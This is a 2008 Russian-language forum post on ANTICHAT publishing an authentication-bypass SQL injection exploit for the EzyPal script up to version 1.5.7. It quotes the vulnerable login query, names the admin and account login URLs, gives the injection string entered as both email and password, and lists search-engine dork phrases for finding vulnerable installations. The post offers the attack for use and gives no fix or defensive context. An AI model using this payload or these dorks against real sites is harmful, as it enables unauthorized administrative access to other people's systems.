HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу EzyPal <= 1.5.7 Admin Authentication Bypass SQL Injection Exploit
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

EzyPal <= 1.5.7 Admin Authentication Bypass SQL Injection Exploit
  #1  
Старый 17.08.2008, 19:10
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами: 10263663

Репутация: 1559


По умолчанию EzyPal <= 1.5.7 Admin Authentication Bypass SQL Injection Exploit
Author: ~!Dok_tOR!~
Product: EzyPal
Version: 1.5.7 возможно и более ранние версии
URL: www.ezypal.com
Vulnerability Class: SQL injection

1.

/[installdir]/admincp/index.php

Vuln Code:

PHP код:
$sql mysql_query("SELECT customer_email FROM ".$config['db_pref']."customers WHERE customer_email = '".$customer_email."' AND customer_password = '".md5($customer_pass)."' AND customer_level = 2") or ErrorDB(2,mysql_errno(),mysql_error()); 
magic_quotes_gpc = Off

Example:
http://[server]/[installdir]/admincp/index.php

Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

2.

Example:
http://[server]/[installdir]/index.php?do=account

Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

Dork:

Powered by EzyPal
Welcome :: EzyPal
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.